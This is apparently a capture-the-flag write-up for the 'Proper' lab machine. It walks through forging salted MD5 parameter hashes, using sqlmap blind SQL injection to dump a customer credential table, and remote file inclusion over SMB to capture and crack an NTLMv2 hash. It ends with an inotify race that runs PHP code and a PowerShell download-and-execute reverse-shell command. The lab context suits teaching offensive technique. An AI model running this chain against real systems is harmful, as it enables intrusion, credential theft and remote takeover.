IP-ADDR: proper.htb

nmap scan:

80/tcp open  http    Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: OS Tidy Inc.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

interesting javascript code snippet in /index.html

from that javascript code products-ajax.php load product list

in this url /products-ajax.php?order=id+desc&h=a1b30d31d344a5a4e41e8496ccbdd26b looks like order parameter contains sql keyword desc in sql that means descending order and if try to change it to ascending aes, server return security error.

❯ curl -i -s ''
HTTP/1.1 403 Forbidden
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/10.0
X-Powered-By: PHP/7.4.1
Date: Sat, 21 Aug 2021 08:20:17 GMT
Content-Length: 39

Forbidden - Tampering attempt detected.

If remove all parameter and only request /products-ajax.php, return snippet of source code in error

<!-- [8] Undefined index: order
On line 6 in file C:\inetpub\wwwroot\products-ajax.php
  1 |   // SECURE_PARAM_SALT needs to be defined prior including functions.php 
  2 |   define('SECURE_PARAM_SALT','hie0shah6ooNoim'); 
  3 |   include('functions.php'); 
  4 |   include('db-config.php'); 
  5 |   if ( !$_GET['order'] || !$_GET['h'] ) {                <<<<< Error encountered in this line.
  6 |     // Set the response code to 500 
  7 |     http_response_code(500); 
  8 |     // and die(). Someone fiddled with the parameters. 
  9 |     die('Parameter missing or malformed.'); 
 10 |   } 
 11 |  
// -->
Parameter missing or malformed.

Gobuster running in background found a directory

/licenses             (Status: 301) [Size: 152] [-->]

Contains a login page

After combine url parameters and source code snippets from response error.


order parameter contains a value that used by server backend and h contains md5 hash, Generated from order parameter value and salt hie0shah6ooNoim.

And indeed it is same.

❯ python -c "from hashlib import md5;print(md5(('hie0shah6ooNoim'+'id desc').encode('utf-8')).hexdigest())"

sql injection

Testing sql injection with sqlmap and Found boolean-based blind sql injection.

sqlmap --eval="import hashlib;h=hashlib.md5(('hie0shah6ooNoim'+order).encode('utf-8')).hexdigest()"  --batch --dbms=mysql --threads=10 -u ""
#... [snip] ...
Parameter: order (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: order=(SELECT (CASE WHEN (7143=7143) THEN 'id desc' ELSE (SELECT 8447 UNION SELECT 3809) END))&h=a1b30d31d344a5a4e41e8496ccbdd26b
#... [snip] ...

After enumerating dbms, Dumping user credentials

sqlmap --eval="import hashlib;h=hashlib.md5(('hie0shah6ooNoim'+order).encode('utf-8')).hexdigest()"  --batch --dbms=mysql --threads=10 -u "" -D cleaner -T customers --dump
#... [snip] ...
Database: cleaner                                                                                                                                                                                                                            
Table: customers
[29 entries]
| id | login                        | password                                     | customer_name        |
| 1  | [email protected] | 7c6a180b36896a0a8c02787eeafb0e4c (password1) | Vikki Solomon        |
| 2  | [email protected]         | 6cb75f652a9b52798eb6cf2201057c73 (password2) | Neave Stone          |
| 3  | [email protected]    | e10adc3949ba59abbe56e057f20f883e (123456)    | Bertie McEachern     |
| 4  | [email protected]      | 827ccb0eea8a706c4c34a16891f84e7b (12345)     | Jordana Kleiser      |
| 5  | [email protected]    | 25f9e794323b453885f5181f1b624d0b (123456789) | Mariellen Chasemore  |
| 6  | [email protected]        | 5f4dcc3b5aa765d61d8327deb882cf99 (password)  | Gwyneth Dornin       |
| 7  | [email protected]         | f25a2fc72690b780b2a14e140ef6a9e0 (iloveyou)  | Israel Tootell       |
| 8  | [email protected]        | 8afa847f50a716e64932d995c8e7435a (princess)  | Karon Mangham        |
| 9  | [email protected]            | fcea920f7412b5da7be0cf42b8c93759 (1234567)   | Janifer Blinde       |
| 10 | [email protected]   | f806fc5a2a0d5ba2471600758452799c (rockyou)   | Laurens Lenchenko    |
| 11 | [email protected]         | 25d55ad283aa400af464c76d713c07ad (12345678)  | Andreana Austin      |
| 12 | [email protected]       | e99a18c428cb38d5f260853678922e03 (abc123)    | Arnold Feldmesser    |
| 13 | [email protected]    | fc63f87c08d505264caba37514cd0cfd (nicole)    | Adella Huntar        |
| 14 | [email protected]    | aa47f8215c6f30a0dcdb2a36a9f4168e (daniel)    | Trudi Alelsandrovich |
| 15 | [email protected]              | 67881381dbc68d4761230131ae0008f7 (babygirl)  | Ivy Shay             |
| 16 | [email protected]             | d0763edaa9d9bd2a9516280e9044d885 (monkey)    | Alys Callaby         |
| 17 | [email protected]             | 061fba5bdfc076bb7362616668de87c8 (lovely)    | Dorena Aery          |
| 18 | [email protected]     | aae039d6aa239cfc121357a825210fa3 (jessica)   | Amble Alekseicik     |
| 19 | [email protected]           | c33367701511b4f6020ec61ded352059 (654321)    | Lin Ginman           |
| 20 | [email protected]              | 0acf4539a14b3aa27deeb4cbdf6e989f (michael)   | Letty Giorio         |
| 21 | [email protected]             | adff44c5102fca279fce7559abf66fee (ashley)    | Lazarus Bysh         |
| 22 | [email protected]            | d8578edf8458ce06fbc5bb76a58c5ca4 (qwerty)    | Bud Klewer           |
| 23 | [email protected]       | 96e79218965eb72c92a549dd5a330112 (111111)    | Woodrow Strettell    |
| 24 | [email protected]     | edbd0effac3fcc98e725920a512881e0 (iloveu)    | Lila O Doran         |
| 25 | [email protected]      | 670b14728ad9902aecba32e22fa4f6bd (000000)    | Bibbie Pfeffel       |
| 26 | [email protected]      | 2345f10bb948c5665ef91f6773b3e455 (michelle)  | Luce Grimsdell       |
| 27 | [email protected]            | f78f2477e949bee2d12a2c540fb6084f (tigger)    | Lyle Pealing         |
| 28 | [email protected]             | 0571749e2ac330a7455809c6b0e7af90 (sunshine)  | Kimmy Russen         |
| 29 | [email protected]  | c378985d629e99a4e86213db0cd5e70d (chocolate) | Meg Eastmond         |

sqlmap do the job and bruteforce all password hashes.

Login with customer creds, Found Same url formate inside /licenses dashboard

Doing same hashing technique this tile return php traceback error.

❯ python -c "from hashlib import md5;print(md5(('hie0shah6ooNoim'+'test').encode('utf-8')).hexdigest())"

this time server is doing file_get_contents on theme parameter.

SMB connect via remote file inclusion

Create a python script to make life easy

from hashlib import md5
from sys import argv
from urllib.parse import quote_plus
import requests as r

s = r.session()
url = ''
data = {"username": "[email protected]", "password": "password1"}, data=data)  # login
theme_param = argv[1]
hash = md5(b"hie0shah6ooNoim" + theme_param.encode('utf-8')).hexdigest()
rspn = s.get(f'{url}licenses.php?theme={quote_plus(theme_param)}&h={hash}')
head, sep, tail = rspn.text.partition('<body>')


Testing theme parameter

LFI not possible because server script appending / in the end of the path.

❯ python '/etc/passwd'
<!-- [2] file_get_contents(/etc/passwd/ failed to open stream: No such file or directory

RFI over http:// wrapper is disabled.

❯ python ''
<!-- [2] include(): http:// wrapper is disabled in the server configuration by allow_url_include=0

When try to connect to smb server,

❯ impacket-smbserver -smb2support smb .

it return "failed to open stream" but smb server get authentication request.

That means server is trying to connect to the smb server with credentials.

this is a Net-NTLMv2 hash and cracked with rockyou.txt

Setup sbm server with creds and successfully included / from from smb server

❯ impacket-smbserver -smb2support smb . -username web -password 'charlotte123!'

If we go back to initial error, we can see that there is a another security check

 33 | function secure_include($file) { 
 34 |   if (strpos(file_get_contents($file),'<?') === false) { 
 35 |     include($file);

This means, If included file contains <? anywhere in the file, it exit out and if not than again doing a another include on that file with include() function.

  • include() function is used to put data of one PHP file into another PHP file.

And if we calculate time, it definitely takes few seconds to execute both includes if all conditions are true.

Race condition with inotify

The inotify API provides a mechanism for monitoring filesystem events. Inotify can be used to monitor individual files, or to monitor directories. When a directory is monitored, inotify will return events for the directory itself, and for files inside the directory.

Get inotify-tools from sudo apt install inotify-tools

We can monitor all events on specific file and do something on every event.

Using inotifywait utility from inotify-tools with -e flag to monitor specific event.

-e|--event <event1> [ -e|--event <event2> ... ]
		Listen for specific event(s).  If omitted, all events are 
		listened for.

	close		file or directory closed, regardless of read/write mode

With that tool finally get php code executed on the server, only issue occurred is that there is some delay between 2 includes, after first closing and second opening of the file. For that i setup 2 event listener, first for closing and second for opening.

echo poorduck >; inotifywait -e close;inotifywait -e open;  echo '<?php echo "poorduck from php!";?>' >

Getting reverse shell with PayloadsAllTheThings powershell payload and nishang revshell ps1

echo poorduck >; inotifywait -e close; inotifywait -e open; echo "<?php system(\"powershell IEX (New-Object Net.WebClient).DownloadString('')\");?>" >
